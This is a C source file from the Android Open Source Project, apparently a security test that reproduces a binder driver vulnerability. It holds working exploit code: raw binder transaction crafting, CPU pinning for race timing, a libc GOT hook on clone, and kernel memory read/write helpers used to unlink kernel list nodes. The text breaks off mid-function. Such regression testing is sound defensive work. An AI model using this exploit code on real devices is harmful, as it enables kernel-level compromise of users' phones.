• Home
  • Line#
  • Scopes#
  • Navigate#
  • Raw
  • Download
1 /*
2  * Copyright (C) 2019 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
17 #define _GNU_SOURCE
18 #include <sys/mman.h>
19 #include <sys/types.h>
20 #include <sys/stat.h>
21 #include <sys/socket.h>
22 #include <sys/un.h>
23 #include <sys/prctl.h>
24 
25 #include <stdio.h>
26 #include <stdlib.h>
27 #include <string.h>
28 #include <syscall.h>
29 #include <pthread.h>
30 #include <dirent.h>
31 #include <unistd.h>
32 #include <fcntl.h>
33 #include <errno.h>
34 #include <sched.h>
35 #include <poll.h>
36 #include <elf.h>
37 
38 #include <cutils/log.h>
39 #include <cutils/properties.h>
40 #include <jni.h>
41 #include <linux/android/binder.h>
42 #include <cpu-features.h>
43 
44 #include "../../../../hostsidetests/securitybulletin/securityPatch/includes/common.h"
45 
46 typedef uint8_t u8;
47 typedef uint16_t u16;
48 typedef uint32_t u32;
49 typedef uint64_t u64;
50 typedef int64_t s64;
51 
52 jobject this;
53 jmethodID add_log;
54 JavaVM *jvm;
55 
56 #define MAX_THREADS 10
57 
58 struct tid_jenv {
59     int tid;
60     JNIEnv *env;
61 };
62 struct tid_jenv tid_jenvs[MAX_THREADS];
63 int num_threads;
64 
gettid()65 int gettid() {
66     return (int)syscall(SYS_gettid);
67 }
68 
69 void fail(char *msg, ...);
70 
add_jenv(JNIEnv * e)71 void add_jenv(JNIEnv *e) {
72     if (num_threads >= MAX_THREADS) {
73         fail("too many threads");
74         return;
75     }
76     struct tid_jenv *te = &tid_jenvs[num_threads++];
77     te->tid = gettid();
78     te->env = e;
79 }
80 
get_jenv()81 JNIEnv *get_jenv() {
82     int tid = gettid();
83     for (int i = 0; i < num_threads; i++) {
84         struct tid_jenv *te = &tid_jenvs[i];
85         if (te->tid == tid)
86             return te->env;
87     }
88     return NULL;
89 }
90 
jni_attach_thread()91 void jni_attach_thread() {
92     JNIEnv *env;
93     (*jvm)->AttachCurrentThread(jvm, &env, NULL);
94     add_jenv(env);
95 }
96 
97 pthread_mutex_t log_mut = PTHREAD_MUTEX_INITIALIZER;
98 pthread_cond_t log_pending = PTHREAD_COND_INITIALIZER;
99 pthread_cond_t log_done = PTHREAD_COND_INITIALIZER;
100 volatile char *log_line;
101 
send_log_thread(char * msg)102 void send_log_thread(char *msg) {
103     pthread_mutex_lock(&log_mut);
104     while (log_line)
105         pthread_cond_wait(&log_done, &log_mut);
106     log_line = msg;
107     pthread_cond_signal(&log_pending);
108     pthread_mutex_unlock(&log_mut);
109 }
110 
111 void dbg(char *msg, ...);
112 
log_thread(u64 arg)113 void log_thread(u64 arg) {
114     while (1) {
115         pthread_mutex_lock(&log_mut);
116         while (!log_line)
117             pthread_cond_wait(&log_pending, &log_mut);
118         dbg("%s", log_line);
119         free((void*)log_line);
120         log_line = NULL;
121         pthread_cond_signal(&log_done);
122         pthread_mutex_unlock(&log_mut);
123     }
124 }
125 
dbg(char * msg,...)126 void dbg(char *msg, ...) {
127     char *line;
128     va_list va;
129     JNIEnv *env = get_jenv();
130     va_start(va, msg);
131     if (vasprintf(&line, msg, va) >= 0) {
132         if (env) {
133             jstring jline = (*env)->NewStringUTF(env, line);
134             (*env)->CallVoidMethod(env, this, add_log, jline);
135             free(line);
136         } else {
137             send_log_thread(line);
138         }
139     }
140     va_end(va);
141 }
142 
fail(char * msg,...)143 void fail(char *msg, ...) {
144     char *line;
145     va_list va;
146     va_start(va, msg);
147     if (vasprintf(&line, msg, va) >= 0)
148         dbg("FAIL: %s (errno=%d)", line, errno);
149     va_end(va);
150 }
151 
152 struct buffer {
153     char *p;
154     u32 size;
155     u32 off;
156 };
157 
158 typedef struct buffer buf_t;
159 
160 struct parser {
161     u8 *buf;
162     u8 *p;
163     u32 size;
164 };
165 
166 typedef struct parser parser_t;
167 
new_parser()168 parser_t *new_parser() {
169     parser_t *ret = malloc(sizeof(parser_t));
170     ret->size = 0x400;
171     ret->buf = ret->p = malloc(ret->size);
172     return ret;
173 }
174 
free_parser(parser_t * parser)175 void free_parser(parser_t *parser) {
176     free(parser->buf);
177     free(parser);
178 }
179 
parser_end(parser_t * p)180 int parser_end(parser_t *p) {
181     return !p->size;
182 }
183 
parser_get(parser_t * p,u32 sz)184 void *parser_get(parser_t *p, u32 sz) {
185     if (sz > p->size) {
186         fail("parser size exceeded");
187         return NULL;
188     }
189     p->size -= sz;
190     u8 *ret = p->p;
191     p->p += sz;
192     return ret;
193 }
194 
parse_u32(parser_t * p)195 u32 parse_u32(parser_t *p) {
196     u32 *pu32 = parser_get(p, sizeof(u32));
197     return (pu32 == NULL) ? (u32)-1 : *pu32;
198 }
199 
new_buf_sz(u32 sz)200 buf_t *new_buf_sz(u32 sz) {
201     buf_t *b = malloc(sizeof(buf_t));
202     b->size = sz;
203     b->off = 0;
204     b->p = malloc(sz);
205     return b;
206 }
207 
new_buf()208 buf_t *new_buf() {
209     return new_buf_sz(0x200);
210 }
211 
free_buf(buf_t * buf)212 void free_buf(buf_t *buf) {
213     free(buf->p);
214     free(buf);
215 }
216 
buf_alloc(buf_t * b,u32 s)217 void *buf_alloc(buf_t *b, u32 s) {
218     s = (s + 3) & ~3;
219     if (b->size - b->off < s)
220         fail("out of buf space");
221     char *ret = b->p + b->off;
222     b->off += s;
223     memset(ret, 0x00, s);
224     return ret;
225 }
226 
buf_u32(buf_t * b,u32 v)227 void buf_u32(buf_t *b, u32 v) {
228     char *p = buf_alloc(b, sizeof(u32));
229     *(u32*)p = v;
230 }
231 
buf_u64(buf_t * b,u64 v)232 void buf_u64(buf_t *b, u64 v) {
233     char *p = buf_alloc(b, sizeof(u64));
234     *(u64*)p = v;
235 }
236 
buf_uintptr(buf_t * b,u64 v)237 void buf_uintptr(buf_t *b, u64 v) {
238     char *p = buf_alloc(b, sizeof(u64));
239     *(u64*)p = v;
240 }
241 
buf_str16(buf_t * b,const char * s)242 void buf_str16(buf_t *b, const char *s) {
243     if (!s) {
244         buf_u32(b, 0xffffffff);
245         return;
246     }
247     u32 len = strlen(s);
248     buf_u32(b, len);
249     u16 *dst = (u16*)buf_alloc(b, (len + 1) * 2);
250     for (u32 i = 0; i < len; i++)
251         dst[i] = s[i];
252     dst[len] = 0;
253 }
254 
buf_binder(buf_t * b,buf_t * off,void * ptr)255 void buf_binder(buf_t *b, buf_t *off, void *ptr) {
256     buf_u64(off, b->off);
257     struct flat_binder_object *fp = buf_alloc(b, sizeof(*fp));
258     fp->hdr.type = BINDER_TYPE_BINDER;
259     fp->flags = FLAT_BINDER_FLAG_ACCEPTS_FDS;
260     fp->binder = (u64)ptr;
261     fp->cookie = 0;
262 }
263 
264 static inline void binder_write(int fd, buf_t *buf);
265 
enter_looper(int fd)266 void enter_looper(int fd) {
267     buf_t *buf = new_buf();
268     buf_u32(buf, BC_ENTER_LOOPER);
269     binder_write(fd, buf);
270 }
271 
init_binder(int fd)272 void init_binder(int fd) {
273     void *map_ret = mmap(NULL, 0x200000, PROT_READ, MAP_PRIVATE, fd, 0);
274     if (map_ret == MAP_FAILED)
275         fail("map fail");
276     enter_looper(fd);
277 }
278 
open_binder()279 int open_binder() {
280     int fd = open("/dev/binder", O_RDONLY);
281     if (fd < 0)
282         fail("open binder fail");
283     init_binder(fd);
284     return fd;
285 }
286 
binder_rw(int fd,void * rbuf,u32 rsize,void * wbuf,u32 wsize,u32 * read_consumed,u32 * write_consumed)287 static inline void binder_rw(int fd, void *rbuf, u32 rsize,
288         void *wbuf, u32 wsize, u32 *read_consumed, u32 *write_consumed) {
289     struct binder_write_read bwr;
290     memset(&bwr, 0x00, sizeof(bwr));
291     bwr.read_buffer = (u64)rbuf;
292     bwr.read_size = rsize;
293     bwr.write_buffer = (u64)wbuf;
294     bwr.write_size = wsize;
295     if (ioctl(fd, BINDER_WRITE_READ, &bwr) < 0)
296         fail("binder ioctl fail");
297     if (read_consumed)
298         *read_consumed = bwr.read_consumed;
299     if (write_consumed)
300         *write_consumed = bwr.write_consumed;
301 }
302 
binder_read(int fd,void * rbuf,u32 rsize,u32 * read_consumed)303 void binder_read(int fd, void *rbuf, u32 rsize, u32 *read_consumed) {
304     binder_rw(fd, rbuf, rsize, 0, 0, read_consumed, NULL);
305 }
306 
binder_write(int fd,buf_t * buf)307 static inline void binder_write(int fd, buf_t *buf) {
308     u32 write_consumed;
309     binder_rw(fd, 0, 0, buf->p, buf->off, NULL, &write_consumed);
310     if (write_consumed != buf->off)
311         fail("binder write fail");
312     free_buf(buf);
313 }
314 
do_send_txn(int fd,u32 to,u32 code,buf_t * trdat,buf_t * troff,int oneway,int is_reply,binder_size_t extra_sz)315 void do_send_txn(int fd, u32 to, u32 code, buf_t *trdat, buf_t *troff, int oneway, int is_reply, binder_size_t extra_sz) {
316     buf_t *buf = new_buf();
317     buf_u32(buf, is_reply ? BC_REPLY_SG : BC_TRANSACTION_SG);
318     struct binder_transaction_data_sg *tr;
319     tr = buf_alloc(buf, sizeof(*tr));
320     struct binder_transaction_data *trd = &tr->transaction_data;
321     trd->target.handle = to;
322     trd->code = code;
323     if (oneway)
324         trd->flags |= TF_ONE_WAY;
325     trd->data.ptr.buffer = trdat ? (u64)trdat->p : 0;
326     trd->data.ptr.offsets = troff ? (u64)troff->p : 0;
327     trd->data_size = trdat ? trdat->off : 0;
328     trd->offsets_size = troff ? troff->off : 0;
329     tr->buffers_size = extra_sz;
330     binder_write(fd, buf);
331     if (trdat)
332         free_buf(trdat);
333     if (troff)
334         free_buf(troff);
335 }
336 
send_txn(int fd,u32 to,u32 code,buf_t * trdat,buf_t * troff)337 void send_txn(int fd, u32 to, u32 code, buf_t *trdat, buf_t *troff) {
338     do_send_txn(fd, to, code, trdat, troff, 0, 0, 0);
339 }
340 
send_reply(int fd)341 void send_reply(int fd) {
342     do_send_txn(fd, 0, 0, NULL, NULL, 0, 1, 0);
343 }
344 
chg_ref(int fd,unsigned desc,u32 cmd)345 static inline void chg_ref(int fd, unsigned desc, u32 cmd) {
346     buf_t *buf = new_buf();
347     buf_u32(buf, cmd);
348     buf_u32(buf, desc);
349     binder_write(fd, buf);
350 }
351 
inc_ref(int fd,unsigned desc)352 void inc_ref(int fd, unsigned desc) {
353     chg_ref(fd, desc, BC_ACQUIRE);
354 }
355 
dec_ref(int fd,unsigned desc)356 void dec_ref(int fd, unsigned desc) {
357     chg_ref(fd, desc, BC_RELEASE);
358 }
359 
free_buffer(int fd,u64 ptr)360 static inline void free_buffer(int fd, u64 ptr) {
361     buf_t *buf = new_buf();
362     buf_u32(buf, BC_FREE_BUFFER);
363     buf_uintptr(buf, ptr);
364     binder_write(fd, buf);
365 }
366 
367 typedef struct {
368     int fd;
369     char *buf;
370     binder_size_t size;
371     binder_size_t parsed;
372     binder_size_t *offsets;
373     binder_size_t num_offsets;
374     u32 code;
375     u64 ptr;
376 } txn_t;
377 
txn_get(txn_t * t,u32 sz)378 void *txn_get(txn_t *t, u32 sz) {
379     sz = (sz + 3) & ~3u;
380     if (sz > t->size - t->parsed)
381         fail("txn get not enough data");
382     char *ret = t->buf + t->parsed;
383     t->parsed += sz;
384     return ret;
385 }
386 
txn_offset(txn_t * t)387 binder_size_t txn_offset(txn_t *t) {
388     return t->parsed;
389 }
390 
txn_set_offset(txn_t * t,binder_size_t off)391 void txn_set_offset(txn_t *t, binder_size_t off) {
392     t->parsed = off;
393 }
394 
txn_u32(txn_t * t)395 u32 txn_u32(txn_t *t) {
396     return *(u32*)txn_get(t, sizeof(u32));
397 }
398 
txn_int(txn_t * t)399 int txn_int(txn_t *t) {
400     return *(int*)txn_get(t, sizeof(int));
401 }
402 
txn_handle(txn_t * t)403 u32 txn_handle(txn_t *t) {
404     struct flat_binder_object *fp;
405     fp = txn_get(t, sizeof(*fp));
406     if (fp->hdr.type != BINDER_TYPE_HANDLE)
407         fail("expected binder");
408     return fp->handle;
409 }
410 
txn_str(txn_t * t)411 u16 *txn_str(txn_t *t) {
412     int len = txn_int(t);
413     if (len == -1)
414         return NULL;
415    if (len > 0x7fffffff / 2 - 1)
416         fail("bad txn str len");
417     return txn_get(t, (len + 1) * 2);
418 }
419 
txn_buf(txn_t * t)420 static inline u64 txn_buf(txn_t *t) {
421     return (u64)t->buf;
422 }
423 
free_txn(txn_t * txn)424 void free_txn(txn_t *txn) {
425     free_buffer(txn->fd, txn_buf(txn));
426 }
427 
428 
handle_cmd(int fd,u32 cmd,void * dat)429 void handle_cmd(int fd, u32 cmd, void *dat) {
430     if (cmd == BR_ACQUIRE || cmd == BR_INCREFS) {
431         struct binder_ptr_cookie *pc = dat;
432         buf_t *buf = new_buf();
433         u32 reply = cmd == BR_ACQUIRE ? BC_ACQUIRE_DONE : BC_INCREFS_DONE;
434         buf_u32(buf, reply);
435         buf_uintptr(buf, pc->ptr);
436         buf_uintptr(buf, pc->cookie);
437         binder_write(fd, buf);
438     }
439 }
440 
recv_txn(int fd,txn_t * t)441 void recv_txn(int fd, txn_t *t) {
442     u32 found = 0;
443     while (!found) {
444         parser_t *p = new_parser();
445         binder_read(fd, p->p, p->size, &p->size);
446         while (!parser_end(p)) {
447             u32 cmd = parse_u32(p);
448             void *dat = (void *)parser_get(p, _IOC_SIZE(cmd));
449             if (dat == NULL) {
450                 return;
451             }
452             handle_cmd(fd, cmd, dat);
453             if (cmd == BR_TRANSACTION || cmd == BR_REPLY) {
454                 struct binder_transaction_data *tr = dat;
455                 if (!parser_end(p))
456                     fail("expected parser end");
457                 t->fd = fd;
458                 t->buf = (char*)tr->data.ptr.buffer;
459                 t->parsed = 0;
460                 t->size = tr->data_size;
461                 t->offsets = (binder_size_t*)tr->data.ptr.offsets;
462                 t->num_offsets = tr->offsets_size / sizeof(binder_size_t);
463                 t->code = tr->code;
464                 t->ptr = tr->target.ptr;
465                 found = 1;
466             }
467         }
468         free_parser(p);
469     }
470 }
471 
recv_handle(int fd)472 u32 recv_handle(int fd) {
473     txn_t txn;
474     recv_txn(fd, &txn);
475     u32 hnd = txn_handle(&txn);
476     inc_ref(fd, hnd);
477     free_txn(&txn);
478     return hnd;
479 }
480 
get_activity_svc(int fd)481 u32 get_activity_svc(int fd) {
482     buf_t *trdat = new_buf();
483     buf_u32(trdat, 0); // policy
484     buf_str16(trdat, "android.os.IServiceManager");
485     buf_str16(trdat, "activity");
486     int SVC_MGR_GET_SERVICE = 1;
487     send_txn(fd, 0, SVC_MGR_GET_SERVICE, trdat, NULL);
488     return recv_handle(fd);
489 }
490 
txn_part(txn_t * t)491 void txn_part(txn_t *t) {
492     int repr = txn_int(t);
493     if (repr == 0) {
494         txn_str(t);
495         txn_str(t);
496     } else if (repr == 1 || repr == 2) {
497         txn_str(t);
498     } else {
499         fail("txn part bad repr");
500     }
501 }
502 
txn_uri(txn_t * t)503 void txn_uri(txn_t *t) {
504     int type = txn_int(t);
505     if (type == 0) // NULL_TYPE_ID
506         return;
507     if (type == 1) { // StringUri.TYPE_ID
508         txn_str(t);
509     } else if (type == 2) {
510         txn_str(t);
511         txn_part(t);
512         txn_part(t);
513     } else if (type == 3) {
514         txn_str(t);
515         txn_part(t);
516         txn_part(t);
517         txn_part(t);
518         txn_part(t);
519     } else {
520         fail("txn uri bad type");
521     }
522 }
523 
txn_component(txn_t * t)524 void txn_component(txn_t *t) {
525     u16 *pkg = txn_str(t);
526     if (pkg)
527         txn_str(t); // class
528 }
529 
txn_rect(txn_t * t)530 void txn_rect(txn_t *t) {
531     txn_int(t);
532     txn_int(t);
533     txn_int(t);
534     txn_int(t);
535 }
536 
str16_eq(u16 * s16,char * s)537 int str16_eq(u16 *s16, char *s) {
538     while (*s) {
539         if (*s16++ != *s++)
540             return 0;
541     }
542     return !*s16;
543 }
544 
txn_bundle(txn_t * t,u32 * hnd)545 void txn_bundle(txn_t *t, u32 *hnd) {
546     int len = txn_int(t);
547     if (len < 0)
548         fail("bad bundle len");
549     if (len == 0)
550         return;
551     int magic = txn_int(t);
552     if (magic != 0x4c444e42 && magic != 0x4c444e44)
553         fail("bad bundle magic");
554     binder_size_t off = txn_offset(t);
555     int count = txn_int(t);
556     if (count == 1) {
557         u16 *key = txn_str(t);
558         int type = txn_int(t);
559         if (str16_eq(key, "bnd") && type == 15)
560             *hnd = txn_handle(t);
561     }
562     txn_set_offset(t, off);
563     txn_get(t, len);
564 }
565 
txn_intent(txn_t * t,u32 * hnd)566 void txn_intent(txn_t *t, u32 *hnd) {
567     txn_str(t); // action
568     txn_uri(t);
569     txn_str(t); // type
570     txn_int(t); // flags
571     txn_str(t); // package
572     txn_component(t);
573     if (txn_int(t)) // source bounds
574         txn_rect(t);
575     int n = txn_int(t);
576     if (n > 0) {
577         for (int i = 0; i < n; i++)
578             txn_str(t);
579     }
580     if (txn_int(t)) // selector
581         txn_intent(t, NULL);
582     if (txn_int(t))
583         fail("unexpected clip data");
584     txn_int(t); // content user hint
585     txn_bundle(t, hnd); // extras
586 }
587 
get_task_info(int fd,u32 app_task,u32 * hnd)588 void get_task_info(int fd, u32 app_task, u32 *hnd) {
589     buf_t *trdat = new_buf();
590     buf_u32(trdat, 0); // policy
591     buf_str16(trdat, "android.app.IAppTask");
592     send_txn(fd, app_task, 1 + 1, trdat, NULL);
593     txn_t txn;
594     recv_txn(fd, &txn);
595     if (txn_u32(&txn) != 0)
596         fail("getTaskInfo exception");
597     if (txn_int(&txn) == 0)
598         fail("getTaskInfo returned null");
599     txn_int(&txn); // id
600     txn_int(&txn); // persistent id
601     if (txn_int(&txn) > 0) // base intent
602         txn_intent(&txn, hnd);
603     if (*hnd != ~0u)
604         inc_ref(fd, *hnd);
605     free_txn(&txn);
606 }
607 
get_app_tasks(int fd,u32 actsvc)608 u32 get_app_tasks(int fd, u32 actsvc) {
609     buf_t *trdat = new_buf();
610     buf_u32(trdat, 0); // policy
611     buf_str16(trdat, "android.app.IActivityManager");
612     buf_str16(trdat, "android.security.cts");
613     send_txn(fd, actsvc, 1 + 199, trdat, NULL);
614     txn_t txn;
615     recv_txn(fd, &txn);
616     if (txn_u32(&txn) != 0)
617         fail("getAppTasks exception");
618     int n = txn_int(&txn);
619     if (n < 0)
620         fail("getAppTasks n < 0");
621     u32 hnd = ~0u;
622     for (int i = 0; i < n; i++) {
623         u32 app_task = txn_handle(&txn);
624         get_task_info(fd, app_task, &hnd);
625         if (hnd != ~0u)
626             break;
627     }
628     if (hnd == ~0u)
629         fail("didn't find intent extras binder");
630     free_txn(&txn);
631     return hnd;
632 }
633 
get_exchg(int fd)634 u32 get_exchg(int fd) {
635     u32 actsvc = get_activity_svc(fd);
636     u32 ret = get_app_tasks(fd, actsvc);
637     dec_ref(fd, actsvc);
638     return ret;
639 }
640 
get_binder(u32 * exchg)641 int get_binder(u32 *exchg) {
642     int fd = open_binder();
643     *exchg = get_exchg(fd);
644     return fd;
645 }
646 
exchg_put_binder(int fd,u32 exchg)647 void exchg_put_binder(int fd, u32 exchg) {
648     buf_t *trdat = new_buf();
649     buf_t *troff = new_buf();
650     buf_u32(trdat, 0); // policy
651     buf_str16(trdat, "android.security.cts.IBinderExchange");
652     buf_binder(trdat, troff, (void*)1);
653     send_txn(fd, exchg, 1, trdat, troff);
654     txn_t txn;
655     recv_txn(fd, &txn);
656     free_txn(&txn);
657 }
658 
exchg_get_binder(int fd,u32 exchg)659 u32 exchg_get_binder(int fd, u32 exchg) {
660     buf_t *trdat = new_buf();
661     buf_u32(trdat, 0); // policy
662     buf_str16(trdat, "android.security.cts.IBinderExchange");
663     send_txn(fd, exchg, 2, trdat, NULL);
664     txn_t txn;
665     recv_txn(fd, &txn);
666     if (txn_u32(&txn) != 0)
667         fail("getBinder exception");
668     u32 hnd = txn_handle(&txn);
669     inc_ref(fd, hnd);
670     free_txn(&txn);
671     return hnd;
672 }
673 
set_idle()674 void set_idle() {
675   struct sched_param param = {
676     .sched_priority = 0
677   };
678   if (sched_setscheduler(0, SCHED_IDLE, &param) < 0)
679     fail("sched_setscheduler fail");
680 }
681 
do_set_cpu(int cpu)682 int do_set_cpu(int cpu) {
683     cpu_set_t set;
684     CPU_ZERO(&set);
685     CPU_SET(cpu, &set);
686     return sched_setaffinity(0, sizeof(set), &set);
687 }
688 
set_cpu(int cpu)689 void set_cpu(int cpu) {
690     if (do_set_cpu(cpu) < 0)
691         fail("sched_setaffinity fail");
692 }
693 
694 struct sync {
695     pthread_cond_t cond;
696     pthread_mutex_t mutex;
697     volatile int triggered;
698     size_t num_waiters;
699     volatile size_t num_waited;
700     volatile size_t num_done;
701 };
702 
703 typedef struct sync sync_t;
704 
alloc_sync()705 sync_t *alloc_sync() {
706     sync_t *ret = malloc(sizeof(sync_t));
707     if (pthread_mutex_init(&ret->mutex, NULL) ||
708         pthread_cond_init(&ret->cond, NULL))
709         fail("pthread init failed");
710     ret->triggered = 0;
711     ret->num_waiters = 1;
712     ret->num_waited = 0;
713     ret->num_done = 0;
714     return ret;
715 }
716 
sync_set_num_waiters(sync_t * sync,size_t num_waiters)717 void sync_set_num_waiters(sync_t *sync, size_t num_waiters) {
718     sync->num_waiters = num_waiters;
719 }
720 
sync_pth_bc(sync_t * sync)721 void sync_pth_bc(sync_t *sync) {
722     if (pthread_cond_broadcast(&sync->cond) != 0)
723         fail("pthread_cond_broadcast failed");
724 }
725 
sync_pth_wait(sync_t * sync)726 void sync_pth_wait(sync_t *sync) {
727     pthread_cond_wait(&sync->cond, &sync->mutex);
728 }
729 
sync_wait(sync_t * sync)730 void sync_wait(sync_t *sync) {
731     pthread_mutex_lock(&sync->mutex);
732     sync->num_waited++;
733     sync_pth_bc(sync);
734     while (!sync->triggered)
735         sync_pth_wait(sync);
736     pthread_mutex_unlock(&sync->mutex);
737 }
738 
sync_signal(sync_t * sync)739 void sync_signal(sync_t *sync) {
740     pthread_mutex_lock(&sync->mutex);
741     while (sync->num_waited != sync->num_waiters)
742         sync_pth_wait(sync);
743     sync->triggered = 1;
744     sync_pth_bc(sync);
745     pthread_mutex_unlock(&sync->mutex);
746 }
747 
sync_done(sync_t * sync)748 void sync_done(sync_t *sync) {
749     pthread_mutex_lock(&sync->mutex);
750     sync->num_done++;
751     sync_pth_bc(sync);
752     while (sync->triggered)
753         sync_pth_wait(sync);
754     pthread_mutex_unlock(&sync->mutex);
755 }
756 
sync_wait_done(sync_t * sync)757 void sync_wait_done(sync_t *sync) {
758     pthread_mutex_lock(&sync->mutex);
759     while (sync->num_done != sync->num_waiters)
760         sync_pth_wait(sync);
761     sync->triggered = 0;
762     sync->num_waited = 0;
763     sync->num_done = 0;
764     sync_pth_bc(sync);
765     pthread_mutex_unlock(&sync->mutex);
766 }
767 
ns_to_timespec(u64 t,struct timespec * ts)768 static inline void ns_to_timespec(u64 t, struct timespec *ts) {
769     const u64 k = 1000000000;
770     ts->tv_sec = t / k;
771     ts->tv_nsec = t % k;
772 }
773 
timespec_to_ns(volatile struct timespec * t)774 static inline u64 timespec_to_ns(volatile struct timespec *t) {
775      return (u64)t->tv_sec * 1000000000 + t->tv_nsec;
776 }
777 
time_now()778 static inline u64 time_now() {
779     struct timespec now;
780     if (clock_gettime(CLOCK_MONOTONIC, &now) < 0)
781         fail("clock_gettime failed");
782     return timespec_to_ns(&now);
783 }
784 
sleep_until(u64 t)785 static inline void sleep_until(u64 t) {
786     struct timespec wake;
787     ns_to_timespec(t, &wake);
788     int ret = clock_nanosleep(CLOCK_MONOTONIC, TIMER_ABSTIME, &wake, NULL);
789     if (ret && ret != EINTR)
790         fail("clock_nanosleep failed");
791 }
792 
set_thread_name(const char * name)793 void set_thread_name(const char *name) {
794     if (prctl(PR_SET_NAME, name) < 0)
795         fail("pr_set_name fail");
796 }
797 
set_timerslack()798 void set_timerslack() {
799     char path[64];
800     sprintf(path, "/proc/%d/timerslack_ns", gettid());
801     int fd = open(path, O_WRONLY);
802     if (fd < 0)
803         fail("open timerslack fail");
804     if (write(fd, "1\n", 2) != 2)
805         fail("write timeslack fail");
806     close(fd);
807 }
808 
809 struct launch_dat {
810     u64 arg;
811     void (*func)(u64);
812     int attach_jni;
813     const char *name;
814 };
815 
thread_start(void * vdat)816 void *thread_start(void *vdat) {
817     struct launch_dat *dat = vdat;
818     if (dat->attach_jni)
819         jni_attach_thread();
820     set_thread_name(dat->name);
821     void (*func)(u64) = dat->func;
822     u64 arg = dat->arg;
823     free(dat);
824     (*func)(arg);
825     return NULL;
826 }
827 
launch_thread(const char * name,void (* func)(u64),sync_t ** sync,u64 arg,int attach_jni)828 int launch_thread(const char *name, void (*func)(u64), sync_t **sync, u64 arg,
829         int attach_jni) {
830     if (sync)
831         *sync = alloc_sync();
832     struct launch_dat *dat = malloc(sizeof(*dat));
833     dat->func = func;
834     dat->arg = arg;
835     dat->attach_jni = attach_jni;
836     dat->name = name;
837     pthread_t th;
838     if (pthread_create(&th, NULL, thread_start, dat) != 0)
839         fail("pthread_create failed");
840     return pthread_gettid_np(th);
841 }
842 
map_path(const char * path,u64 * size)843 void *map_path(const char *path, u64 *size) {
844     int fd = open(path, O_RDONLY);
845     if (fd < 0)
846         fail("open libc fail");
847     struct stat st;
848     if (fstat(fd, &st) < 0)
849         fail("fstat fail");
850     void *map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
851     if (map == MAP_FAILED)
852         fail("mmap libc fail");
853     *size = st.st_size;
854     close(fd);
855     return map;
856 }
857 
858 typedef Elf64_Ehdr ehdr_t;
859 typedef Elf64_Shdr shdr_t;
860 typedef Elf64_Rela rela_t;
861 typedef Elf64_Sym sym_t;
862 
find_rela_plt(void * elf)863 shdr_t *find_rela_plt(void *elf) {
864     ehdr_t *ehdr = (ehdr_t *)elf;
865     shdr_t *shdr = ((shdr_t *)elf) + ehdr->e_shoff;
866     char *shstr = ((char *)elf) + shdr[ehdr->e_shstrndx].sh_offset;
867     for (u64 i = 0; i < ehdr->e_shnum; i++) {
868         char *name = shstr + shdr[i].sh_name;
869         if (strcmp(name, ".rela.plt") == 0)
870             return &shdr[i];
871     }
872     fail("didn't find .rela.plt");
873     return NULL;
874 }
875 
find_elf_clone_got(const char * path)876 u64 find_elf_clone_got(const char *path) {
877     u64 mapsz;
878     void *elf = map_path(path, &mapsz);
879     ehdr_t *ehdr = (ehdr_t *)elf;
880     shdr_t *shdr = ((shdr_t *)elf) + ehdr->e_shoff;
881     shdr_t *rphdr = find_rela_plt(elf);
882     if (rphdr == NULL) {
883         return (u64)0;
884     }
885     shdr_t *symhdr = &shdr[rphdr->sh_link];
886     shdr_t *strhdr = &shdr[symhdr->sh_link];
887     sym_t *sym = ((sym_t *)elf) + symhdr->sh_offset;
888     char *str = ((char *)elf) + strhdr->sh_offset;
889     rela_t *r = ((rela_t *)elf) + rphdr->sh_offset;
890     rela_t *end = r + rphdr->sh_size / sizeof(rela_t);
891     u64 ret = 0;
892     for (; r < end; r++) {
893         sym_t *s = &sym[ELF64_R_SYM(r->r_info)];
894         if (strcmp(str + s->st_name, "clone") == 0) {
895             ret = r->r_offset;
896             break;
897         }
898     }
899     if (!ret) {
900         fail("clone rela not found");
901         return (u64)0;
902     }
903     if (munmap(elf, mapsz) < 0) {
904         fail("munmap fail");
905         return (u64)0;
906     }
907     return ret;
908 }
909 
910 int hook_tid;
911 int (*real_clone)(u64 a, u64 b, int flags, u64 c, u64 d, u64 e, u64 f);
912 
clone_unshare_files(u64 a,u64 b,int flags,u64 c,u64 d,u64 e,u64 f)913 int clone_unshare_files(u64 a, u64 b, int flags, u64 c, u64 d, u64 e, u64 f) {
914     if (gettid() == hook_tid)
915         flags &= ~CLONE_FILES;
916     return (*real_clone)(a, b, flags, c, d, e, f);
917 }
918 
unshare_following_clone_files()919 void unshare_following_clone_files() {
920     hook_tid = gettid();
921 }
922 
hook_clone()923 void hook_clone() {
924     void *p = (void*)((uintptr_t)clone & ~0xffful);
925     while (*(u32*)p != 0x464c457f)
926         p = (void *)(((u32 *)p) - 0x1000);
927     u64 *got = ((u64 *)p) + find_elf_clone_got("/system/lib64/libc.so");
928     if (*got != (u64)clone)
929         fail("bad got");
930     real_clone = (void*)clone;
931     void *page = (void*)((u64)got & ~0xffful);
932     if (mprotect(page, 0x1000, PROT_READ | PROT_WRITE) < 0) {
933         fail("got mprotect fail");
934         return;
935     }
936     *got = (u64)clone_unshare_files;
937 }
938 
939 u32 r32(u64 addr);
940 u64 r64(u64 addr);
941 void w64(u64 addr, u64 val);
942 void w128(u64 addr, u64 v1, u64 v2);
943 u64 scratch;
944 u64 rw_task;
945 u64 current;
946 u64 fdarr;
947 
hlist_del(u64 node)948 void hlist_del(u64 node) {
949     u64 next = r64(node);
950     u64 pprev = r64(node + 8);
951     if (r64(pprev) != node) {
952         fail("bad hlist");
953         return;
954     }
955     w64(pprev, next);
956     if (next)
957         w64(next + 8, pprev);
958 }
959 
get_file(int fd)960 u64 get_file(int fd) {
961     return r64(fdarr + fd * 8);
962 }
963 
first_bl(u64 func)964 u64 first_bl(u64 func) {
965     for (int i = 0; i < 30; i++) {
966         u32 inst = r32(func + i * 4);
967         if ((inst >> 26) == 0x25) { // bl
968             s64 off = inst & ((1u << 26) - 1);
969             off <<= 64 - 26;
970             off >>= 64 - 26;
971             return func + i * 4 + off * 4;
972         }
973     }
974     fail("bl not found");
975     return (u64)-1;
976 }
977 
is_adrp(u32 inst)978 int is_adrp(u32 inst) {
